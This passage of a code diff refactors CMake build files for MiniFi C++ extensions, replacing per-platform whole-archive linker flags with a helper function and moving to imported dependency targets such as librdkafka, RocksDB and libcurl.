-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
+	target_wholearchive_library(${testfilename} minifi-http-curl)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
   	MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
 #	 add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
@@ -53,8 +47,6 @@
 FOREACH(testfile ${CURL_INTEGRATION_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}/include")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
@@ -65,15 +57,11 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/civetweb/")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
 	createTests("${testfilename}")
-        if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors)
-	elseif(WIN32)
-		target_link_libraries ("${testfilename}" ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-http-curl /WHOLEARCHIVE:minifi-standard-processors")
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-http-curl minifi-civet-extensions  minifi-standard-processors -Wl,--no-whole-archive)
-  	endif()
-  MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
+	target_wholearchive_library(${testfilename} minifi-http-curl)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+
+    MATH(EXPR CURL_INT_TEST_COUNT "${CURL_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${CURL_INT_TEST_COUNT} libcURL integration test file(s)...")
@@ -86,15 +74,15 @@
 add_test(NAME C2UpdateAgentTest COMMAND C2UpdateAgentTest "${TEST_RESOURCES}/TestHTTPGet.yml"  "${TEST_RESOURCES}/")
 add_test(NAME C2FailedUpdateTest COMMAND C2FailedUpdateTest "${TEST_RESOURCES}/TestHTTPGet.yml" "${TEST_RESOURCES}/TestBad.yml"  "${TEST_RESOURCES}/")
 add_test(NAME C2NullConfiguration COMMAND C2NullConfiguration "${TEST_RESOURCES}/TestNull.yml"  "${TEST_RESOURCES}/")
-if(OPENSSL_FOUND)
+if(NOT OPENSSL_OFF)
 add_test(NAME HttpGetIntegrationTestSecure COMMAND HttpGetIntegrationTest "${TEST_RESOURCES}/TestHTTPGetSecure.yml"  "${TEST_RESOURCES}/")
+add_test(NAME C2VerifyHeartbeatAndStopSecure COMMAND C2VerifyHeartbeatAndStop "${TEST_RESOURCES}/C2VerifyHeartbeatAndStopSecure.yml" "${TEST_RESOURCES}/")
 endif()
 add_test(NAME HttpPostIntegrationTest COMMAND HttpPostIntegrationTest "${TEST_RESOURCES}/TestHTTPPost.yml" "${TEST_RESOURCES}/")
 if (NOT APPLE)
 add_test(NAME HttpPostIntegrationTestChunked COMMAND HttpPostIntegrationTest "${TEST_RESOURCES}/TestHTTPPostChunkedEncoding.yml" "${TEST_RESOURCES}/")
 endif()
 add_test(NAME C2VerifyServeResults COMMAND C2VerifyServeResults "${TEST_RESOURCES}/C2VerifyServeResults.yml" "${TEST_RESOURCES}/")
-add_test(NAME C2VerifyHeartbeatAndStopSecure COMMAND C2VerifyHeartbeatAndStop "${TEST_RESOURCES}/C2VerifyHeartbeatAndStopSecure.yml" "${TEST_RESOURCES}/")
 add_test(NAME C2VerifyHeartbeatAndStop COMMAND C2VerifyHeartbeatAndStop "${TEST_RESOURCES}/C2VerifyHeartbeatAndStop.yml" )
 add_test(NAME HTTPSiteToSiteTests COMMAND HTTPSiteToSiteTests "${TEST_RESOURCES}/TestHTTPSiteToSite.yml" "${TEST_RESOURCES}/" "http://localhost:8099/nifi-api")
 add_test(NAME SiteToSiteRestTest COMMAND SiteToSiteRestTest "${TEST_RESOURCES}/TestSite2SiteRest.yml" "${TEST_RESOURCES}/" "http://localhost:8077/nifi-api/site-to-site")
diff --git a/extensions/jni/CMakeLists.txt b/extensions/jni/CMakeLists.txt
index ac4c3b2..4e9ee72 100644
--- a/extensions/jni/CMakeLists.txt
+++ b/extensions/jni/CMakeLists.txt
@@ -97,20 +97,16 @@
 	message("Maven could not be invoked to build the framework jar")

 endif()

 

-

-

-

+target_link_libraries (minifi-jni ${LIBMINIFI})

 

 if (APPLE)

-	target_link_libraries (minifi-jni  -Wl,-all_load ${JAVA_JVM_LIBRARY})

-else ()

-	if (WIN32)

-		target_link_libraries (minifi-jni  ${JAVA_JVM_LIBRARY})

-		target_link_libraries (minifi-jni  ${Java_LIBRARIES})

-	else()

-		target_link_libraries (minifi-jni  ${JAVA_JVM_LIBRARY})

-	endif()

-endif ()

+	target_link_libraries (minifi-jni ${JAVA_JVM_LIBRARY})

+elseif (WIN32)

+	target_link_libraries (minifi-jni ${JAVA_JVM_LIBRARY})

+	target_link_libraries (minifi-jni ${Java_LIBRARIES})

+else()

+	target_link_libraries (minifi-jni ${JAVA_JVM_LIBRARY})

+endif()

 

 

 

diff --git a/extensions/libarchive/CMakeLists.txt b/extensions/libarchive/CMakeLists.txt
index 3463999..ee83624 100644
--- a/extensions/libarchive/CMakeLists.txt
+++ b/extensions/libarchive/CMakeLists.txt
@@ -34,23 +34,9 @@
   target_link_libraries(minifi-archive-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-
-# Include UUID
 target_link_libraries(minifi-archive-extensions ${LIBMINIFI})
-target_link_libraries(minifi-archive-extensions archive_static )
-if (WIN32)
-    set_target_properties(minifi-archive-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-archive-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-archive-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-archive-extensions RapidJSON)
+target_link_libraries(minifi-archive-extensions archive_static)
 
 
 SET (ARCHIVE-EXTENSIONS minifi-archive-extensions PARENT_SCOPE)
diff --git a/extensions/librdkafka/CMakeLists.txt b/extensions/librdkafka/CMakeLists.txt
index aa74bbf..a0856ab 100644
--- a/extensions/librdkafka/CMakeLists.txt
+++ b/extensions/librdkafka/CMakeLists.txt
@@ -30,64 +30,8 @@
   target_link_libraries(minifi-rdkafka-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-  set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/kafka")
-  if (WIN32)
-  	set(BYPRODUCT "${BASE_DIR}/install/lib/rdkafka.lib")
-  else()
-  	set(BYPRODUCT "${BASE_DIR}/install/lib/librdkafka.a")
-  endif()
-
-list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST "${CMAKE_SOURCE_DIR}/cmake/ssl")
-if(WIN32 OR NOT USE_SYSTEM_ZLIB)
-    list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST "${CMAKE_SOURCE_DIR}/cmake/zlib/dummy")
-endif()
-string(REPLACE ";" "%" CMAKE_MODULE_PATH_PASSTHROUGH "${CMAKE_MODULE_PATH_PASSTHROUGH_LIST}")
-
-find_package(Patch REQUIRED)
-
-ExternalProject_Add(
-    kafka-external
-    URL "https://github.com/edenhill/librdkafka/archive/v1.0.1.tar.gz"
-    URL_HASH "SHA256=b2a2defa77c0ef8c508739022a197886e0644bd7bf6179de1b68bdffb02b3550"
-    PATCH_COMMAND "${Patch_EXECUTABLE}" -p1 -i "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka/librdkafka-libressl.patch"
-    PREFIX "${BASE_DIR}"
-    LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
-    CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-               "-DCMAKE_INSTALL_PREFIX=${BASE_DIR}/install"
-               "-DWITH_SASL=OFF"
-               "-DWITH_SSL=ON"
-               "-DRDKAFKA_BUILD_STATIC=ON"
-               "-DRDKAFKA_BUILD_EXAMPLES=OFF"
-               "-DRDKAFKA_BUILD_TESTS=OFF"
-               "-DENABLE_LZ4_EXT=OFF"
-               "-DWITH_ZSTD=OFF"
-               "-DCMAKE_MODULE_PATH=${CMAKE_MODULE_PATH_PASSTHROUGH}"
-               "-DCMAKE_C_FLAGS=${CURL_C_FLAGS}"
-               "-DCMAKE_INSTALL_LIBDIR=lib"
-               "-DCMAKE_CXX_FLAGS=${CURL_CXX_FLAGS}"
-               "-DLIBRESSL_BIN_DIR=${LIBRESSL_BIN_DIR}"
-               "-DLIBRESSL_SRC_DIR=${LIBRESSL_SRC_DIR}"
-               "-DBYPRODUCT_PREFIX=${BYPRODUCT_PREFIX}"
-               "-DBYPRODUCT_SUFFIX=${BYPRODUCT_SUFFIX}"
-               "-DZLIB_BYPRODUCT_INCLUDE=${ZLIB_BYPRODUCT_INCLUDE}"
-               "-DZLIB_BYPRODUCT=${ZLIB_BYPRODUCT}"
-               "-DZLIB_LIBRARY=${ZLIB_LIBRARY}"
-               "-DZLIB_LIBRARIES=${ZLIB_LIBRARIES}"
-               "-DLIBRDKAFKA_STATICLIB=1"
-    EXCLUDE_FROM_ALL TRUE
-  )
-add_dependencies(kafka-external libressl-portable)
-if(WIN32 OR NOT USE_SYSTEM_ZLIB)
-    add_dependencies(kafka-external zlib-external)
-endif()
-set(KAFKA_INCLUDE "${BASE_DIR}/install/include/librdkafka/")
-set(KAFKA_LIBRARY "${BYPRODUCT}")
-add_definitions("-DLIBRDKAFKA_STATICLIB=1")
-add_dependencies(minifi-rdkafka-extensions kafka-external)
-include_directories(${ZLIB_INCLUDE_DIRS})
-include_directories(${KAFKA_INCLUDE})
-
-target_link_libraries(minifi-rdkafka-extensions ${KAFKA_LIBRARY} ${OPENSSL_LIBRARIES} ${ZLIB_LIBRARIES})
+target_link_libraries(minifi-rdkafka-extensions ${LIBMINIFI})
+target_link_libraries(minifi-rdkafka-extensions librdkafka)
 
 SET (RDKAFKA-EXTENSIONS minifi-rdkafka-extensions PARENT_SCOPE)
 
diff --git a/extensions/mqtt/CMakeLists.txt b/extensions/mqtt/CMakeLists.txt
index e1d4da9..1b7cacd 100644
--- a/extensions/mqtt/CMakeLists.txt
+++ b/extensions/mqtt/CMakeLists.txt
@@ -18,34 +18,17 @@
 #
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt) 
-include_directories(./controllerservice ./processors ./protocol ../../libminifi/include  ../../libminifi/include/core  ../../thirdparty/spdlog-20170710/include ../../thirdparty/concurrentqueue ../../thirdparty/)
-
-include_directories(../../thirdparty/paho.mqtt.c/src)
+include_directories(./controllerservice ./processors ./protocol ../../libminifi/include  ../../libminifi/include/core)
 
 file(GLOB SOURCES "*.cpp" "protocol/*.cpp" "processors/*.cpp" "controllerservice/*.cpp")
 
-
 set(PAHO_BUILD_STATIC "ON" CACHE STRING "" FORCE)
 
 add_library(minifi-mqtt-extensions STATIC ${SOURCES})
 set_property(TARGET minifi-mqtt-extensions PROPERTY POSITION_INDEPENDENT_CODE ON)
 
-target_link_libraries(minifi-mqtt-extensions ${CMAKE_DL_LIBS} )
-target_link_libraries(minifi-mqtt-extensions paho-mqtt3cs-static )
-
-if (WIN32)
-    set_target_properties(minifi-mqtt-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-mqtt-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-mqtt-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-mqtt-extensions ${LIBMINIFI})
+target_link_libraries(minifi-mqtt-extensions paho.mqtt.c)
 
 
 SET (MQTT-EXTENSIONS minifi-mqtt-extensions PARENT_SCOPE)
diff --git a/extensions/opc/CMakeLists.txt b/extensions/opc/CMakeLists.txt
index 9a77ca1..b9968b0 100644
--- a/extensions/opc/CMakeLists.txt
+++ b/extensions/opc/CMakeLists.txt
@@ -23,8 +23,6 @@
 
 include_directories(include)
 
-add_definitions(-DUA_ENABLE_ENCRYPTION)
-
 file(GLOB SOURCES "src/*.cpp")
 
 add_library(minifi-opc-extensions STATIC ${SOURCES})
@@ -37,21 +35,8 @@
   target_link_libraries(minifi-opc-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-opc-extensions ${CMAKE_DL_LIBS} open62541::open62541)
-
-if (WIN32)
-    set_target_properties(minifi-opc-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-opc-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-opc-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-opc-extensions ${LIBMINIFI})
+target_link_libraries(minifi-opc-extensions ${CMAKE_DL_LIBS} spdlog open62541::open62541)
 
 
 SET (OPC-EXTENSIONS minifi-opc-extensions PARENT_SCOPE)
diff --git a/extensions/opencv/CMakeLists.txt b/extensions/opencv/CMakeLists.txt
index efebf55..49d5e99 100644
--- a/extensions/opencv/CMakeLists.txt
+++ b/extensions/opencv/CMakeLists.txt
@@ -21,17 +21,12 @@
 
 file(GLOB SOURCES  "*.cpp")
 
-set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/opencv")
-set(BYPRODUCT "${CMAKE_CURRENT_BINARY_DIR}/opencv-install/")
-
 set(BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/opencv")
 set(BYPRODUCT "${BASE_DIR}/install")
 
-# OpenCV 4.1.0
-build_git_project(opencv-external "${BASE_DIR}" "https://github.com/opencv/opencv.git" "371bba8f54560b374fbcd47e7e02f015ac4969ad"
-        -DCMAKE_BUILD_TYPE=Release
-        -DBUILD_JAVA=OFF
-        -DBUILD_FAT_JAVA_LIB=OFF
+# OpenCV
+build_git_project(opencv-external "${BASE_DIR}" "https://github.com/opencv/opencv.git" "4.1.0"
+        ${PASSTHROUGH_CMAKE_ARGS}
         -DCMAKE_INSTALL_PREFIX=${BYPRODUCT}
         -DBUILD_SHARED_LIBS=OFF
         -DBUILD_EXAMPLES=OFF
@@ -55,20 +50,28 @@
         -DBUILD_opencv_stitching=ON
         -DBUILD_opencv_video=ON
         -DBUILD_opencv_videoio=ON
-        -DWITH_1394=OFF
+	-DBUILD_JAVA=OFF
+        -DBUILD_FAT_JAVA_LIB=OFF
+        -DBUILD_ZLIB=OFF
+	-DWITH_1394=OFF
         -DWITH_FFMPEG=OFF
         -DWITH_GSTREAMER=OFF
         -DWITH_GTK=OFF
         -DWITH_IPP=OFF
         -DWITH_JASPER=OFF
         -DWITH_OPENEXR=OFF
-        -DWITH_ITT=OFF)
+        -DWITH_ITT=OFF
+        -DWITH_OPENEXR=OFF
+        -DWITH_WEBP=OFF
+        -DWITH_TIFF=OFF)
 
 add_library(minifi-opencv STATIC ${SOURCES})
 
+target_link_libraries(minifi-opencv ${LIBMINIFI})
+
 set(OpenCV_DIR ${BASE_DIR})
-find_package( OpenCV REQUIRED PATHS "${BASE_DIR}/opencv-external/src/opencv-external-build/")
-target_link_libraries( minifi-opencv ${OpenCV_LIBS} )
+find_package(OpenCV REQUIRED PATHS "${BASE_DIR}/opencv-external/src/opencv-external-build/")
+target_link_libraries(minifi-opencv ${OpenCV_LIBS})
 include_directories(${OpenCV_INCLUDE_DIRS})
 
 SET (OPENCV-EXTENSION minifi-opencv PARENT_SCOPE)
diff --git a/extensions/opencv/tests/CMakeLists.txt b/extensions/opencv/tests/CMakeLists.txt
index 34693db..d0e1b03 100644
--- a/extensions/opencv/tests/CMakeLists.txt
+++ b/extensions/opencv/tests/CMakeLists.txt
@@ -21,23 +21,13 @@
 
 SET(OPENCV_TEST_COUNT 0)
 
-if (WIN32)
-	set(LINK_FLAGS "/WHOLEARCHIVE")
-	set(LINK_END_FLAGS "")
-elseif (APPLE)
-	set(LINK_FLAGS "-Wl,-all_load")
-	set(LINK_END_FLAGS "")
-else ()
-	set(LINK_FLAGS "-Wl,--whole-archive")
-	set(LINK_END_FLAGS "-Wl,--no-whole-archive")
-endif ()
-
 FOREACH(testfile ${OPENCV_TESTS})
 	get_filename_component(testfilename "${testfile}" NAME_WE)
 	add_executable("${testfilename}" "${testfile}")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/opencv/")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
-	target_link_libraries (${testfilename} ${LINK_FLAGS} minifi-opencv minifi-standard-processors ${LINK_END_FLAGS})
+	target_wholearchive_library(${testfilename} minifi-opencv)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	MATH(EXPR OPENCV_TEST_COUNT "${OPENCV_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
diff --git a/extensions/pcap/CMakeLists.txt b/extensions/pcap/CMakeLists.txt
index e2234a5..25d89cb 100644
--- a/extensions/pcap/CMakeLists.txt
+++ b/extensions/pcap/CMakeLists.txt
@@ -62,22 +62,14 @@
 

 add_dependencies(minifi-pcap pcappp)

 

-if (WIN32)

-	target_link_libraries (minifi-pcap ${PCAP_LIBRARIES} ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a )

-    set_target_properties(minifi-pcap PROPERTIES

-        LINK_FLAGS "/WHOLEARCHIVE"

-    )

-elseif (APPLE)

-	target_link_libraries (minifi-pcap -Wl,-all_load ${PCAP_LIBRARIES} ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a )

+target_link_libraries (minifi-pcap ${PCAP_LIBRARIES} ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a)

+if (APPLE)

 	target_link_libraries(minifi-pcap "-framework CoreFoundation")

 	target_link_libraries(minifi-pcap "-framework SystemConfiguration")

-	set_target_properties(minifi-pcap PROPERTIES LINK_FLAGS "-Wl,-F/Library/Frameworks -Wl,-all_load")

-else ()

-	target_link_libraries (minifi-pcap ${PCAPPLUSPLUS_LIB_DIR}/libPcap++.a ${PCAPPLUSPLUS_LIB_DIR}/libPacket++.a ${PCAPPLUSPLUS_LIB_DIR}/libCommon++.a ${PCAP_LIBRARIES})

+	set_target_properties(minifi-pcap PROPERTIES LINK_FLAGS "-Wl,-F/Library/Frameworks")

 endif ()

 

-target_link_libraries(minifi-pcap ${LIBMINIFI} )

-target_link_libraries(minifi-pcap ${CMAKE_DL_LIBS} )

+target_link_libraries(minifi-pcap ${LIBMINIFI})

 

 SET (PCAP-EXTENSION minifi-pcap PARENT_SCOPE)

 register_extension(minifi-pcap)

diff --git a/extensions/rocksdb-repos/CMakeLists.txt b/extensions/rocksdb-repos/CMakeLists.txt
index 56ec15e..9bf81bb 100644
--- a/extensions/rocksdb-repos/CMakeLists.txt
+++ b/extensions/rocksdb-repos/CMakeLists.txt
@@ -19,15 +19,6 @@
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt) 
 
-find_package(RocksDB)
-
-if (NOT ROCKSDB_FOUND OR BUILD_ROCKSDB)
-	include_directories(${ROCKSDB_THIRDPARTY_ROOT}/include)
-else()
-	include_directories(${ROCKSDB_INCLUDE_DIR})
-endif()
-
-
 file(GLOB SOURCES  "*.cpp")
 
 add_library(minifi-rocksdb-repos STATIC ${SOURCES})
@@ -39,32 +30,8 @@
   target_link_libraries(minifi-rocksdb-repos "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-
 target_link_libraries(minifi-rocksdb-repos ${LIBMINIFI})
-target_link_libraries(minifi-rocksdb-repos ${CMAKE_DL_LIBS} )
-if (ROCKSDB_FOUND AND NOT BUILD_ROCKSDB)
-	target_link_libraries(minifi-rocksdb-repos ${ROCKSDB_LIBRARIES} )
-else()
-	target_link_libraries(minifi-rocksdb-repos rocksdb )
-endif()
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-rocksdb-repos ${ZLIB_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-rocksdb-repos PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-rocksdb-repos PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-rocksdb-repos PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
+target_link_libraries(minifi-rocksdb-repos RocksDB::RocksDB)
 
 SET (ROCKSDB-REPOS minifi-rocksdb-repos PARENT_SCOPE)
-
 register_extension(minifi-rocksdb-repos)
diff --git a/extensions/script/CMakeLists.txt b/extensions/script/CMakeLists.txt
index a82b2aa..22a4cd8 100644
--- a/extensions/script/CMakeLists.txt
+++ b/extensions/script/CMakeLists.txt
@@ -53,9 +53,6 @@
 endif()
 
 target_link_libraries(minifi-script-extensions ${LIBMINIFI})
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-script-extensions ${CMAKE_DL_LIBS})
 
 if (NOT DISABLE_PYTHON_SCRIPTING)
     find_package(PythonLibs 3.5)
@@ -72,7 +69,8 @@
     file(GLOB PY_SOURCES  "python/*.cpp")
     add_library(minifi-python-extensions STATIC ${PY_SOURCES})
 
-    target_link_libraries(minifi-python-extensions ${LIBMINIFI} ${PYTHON_LIBRARIES})
+    target_link_libraries(minifi-python-extensions ${LIBMINIFI})
+    target_link_libraries(minifi-python-extensions ${PYTHON_LIBRARIES})
     target_link_libraries(minifi-script-extensions minifi-python-extensions)
 endif()
 
@@ -80,7 +78,6 @@
     find_package(Lua REQUIRED)
 
     include_directories(${LUA_INCLUDE_DIR})
-    include_directories(../../thirdparty/sol2-2.20.0)
 
     include_directories(lua)
     add_definitions(-DLUA_SUPPORT)
@@ -88,24 +85,11 @@
     file(GLOB LUA_SOURCES  "lua/*.cpp")
     add_library(minifi-lua-extensions STATIC ${LUA_SOURCES})
 
-    target_link_libraries(minifi-lua-extensions ${LUA_LIBRARIES})
+    target_link_libraries(minifi-lua-extensions ${LIBMINIFI})
+    target_link_libraries(minifi-lua-extensions ${LUA_LIBRARIES} sol)
     target_link_libraries(minifi-script-extensions minifi-lua-extensions)
 endif()
 
-if (WIN32)
-    set_target_properties(minifi-script-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-script-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-script-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
 SET (SCRIPTING-EXTENSIONS minifi-script-extensions PARENT_SCOPE)
 
 register_extension(minifi-script-extensions)
diff --git a/extensions/sensors/CMakeLists.txt b/extensions/sensors/CMakeLists.txt
index 5e5bf64..e78ff08 100644
--- a/extensions/sensors/CMakeLists.txt
+++ b/extensions/sensors/CMakeLists.txt
@@ -32,21 +32,7 @@
   target_link_libraries(minifi-sensors "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-sensors ${LIBMINIFI} )
-
-if (WIN32)
-    set_target_properties(minifi-sensors PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-sensors PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-sensors PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-sensors ${LIBMINIFI})
 
 add_dependencies(minifi-sensors RTIMULib)
 target_link_libraries(minifi-sensors RTIMULib)
diff --git a/extensions/sftp/CMakeLists.txt b/extensions/sftp/CMakeLists.txt
index 47ea7bc..48a7012 100644
--- a/extensions/sftp/CMakeLists.txt
+++ b/extensions/sftp/CMakeLists.txt
@@ -17,8 +17,6 @@
 # under the License.
 #
 
-find_package(CURL REQUIRED)
-
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 include_directories(client processors)
 
@@ -33,62 +31,9 @@
 	target_link_libraries(minifi-sftp "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-if (CURL_FOUND)
-	include_directories(${CURL_INCLUDE_DIRS})
-	if (WIN32)
-		message("Including ${CURL_LIBRARY}")
-		target_link_libraries (minifi-sftp ${CURL_LIBRARY})
-		set_target_properties(minifi-sftp PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${CURL_LIBRARY}")
-	else()
-		target_link_libraries(minifi-sftp ${CURL_LIBRARIES})
-	endif()
-endif ()
-
 target_link_libraries(minifi-sftp ${LIBMINIFI})
 
-# Include OpenSSL
-set(OPENSSL_USE_STATIC_LIBS TRUE)
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-
-target_link_libraries(minifi-sftp ${CMAKE_DL_LIBS})
-
-# Include LibSSH2
-find_package(LibSSH2 REQUIRED)
-include_directories(${LIBSSH2_INCLUDE_DIR})
-target_link_libraries(minifi-sftp ${LIBSSH2_LIBRARY})
-
-# Include zlib
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries(minifi-sftp ${ZLIB_LIBRARIES})
-
-# Include RapidJSON
-include_directories(thirdparty/rapidjson-1.1.0/include)
-
-if (WIN32)
-message("${OPENSSL_LIBRARIES}")
-	set (WIN32_ARCHIVES "")
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		if (WIN32)
-		if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-				message( FATAL "Including ${OPENSSL_LIB}")
-		set_target_properties(minifi-sftp PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-		endif()
-	endif()
-	endforeach()
-
-elseif (APPLE)
-	target_link_libraries(minifi-sftp ${OPENSSL_LIBRARIES})
-    set_target_properties(minifi-sftp PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-	message("${OPENSSL_LIBRARIES}")
-	foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-		target_link_libraries (minifi-sftp ${OPENSSL_LIB})
-	endforeach()
-endif ()
+target_link_libraries(minifi-sftp CURL::libcurl libssh2 RapidJSON)
 
 SET (SFTP minifi-sftp PARENT_SCOPE)
 register_extension(minifi-sftp)
diff --git a/extensions/sftp/tests/CMakeLists.txt b/extensions/sftp/tests/CMakeLists.txt
index d350dbd..e12970c 100644
--- a/extensions/sftp/tests/CMakeLists.txt
+++ b/extensions/sftp/tests/CMakeLists.txt
@@ -29,7 +29,6 @@
 	FOREACH(testfile ${SFTP_INTEGRATION_TESTS})
 		get_filename_component(testfilename "${testfile}" NAME_WE)
 		add_executable("${testfilename}" "${testfile}")
-		target_include_directories(${testfilename} BEFORE PRIVATE ${CURL_INCLUDE_DIRS})
 		target_include_directories(${testfilename} BEFORE PRIVATE ${LIBSSH2_INCLUDE_DIR})
 		target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
 		target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/standard-processors/processors")
@@ -42,16 +41,12 @@
 		target_include_directories(${testfilename} BEFORE PRIVATE ./include)
 		target_include_directories(${testfilename} BEFORE PRIVATE ./tools)
 
-		# need to add reference to minifi to get EL support for these tests.
-		# these tests aren't valid without EL
-		if (APPLE)
-			target_link_libraries (${testfilename} -Wl,-all_load ${LIBSSH2_LIBRARY} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES}  minifi-expression-language-extensions minifi-sftp minifi-standard-processors sftp-test-tools)
-		else ()
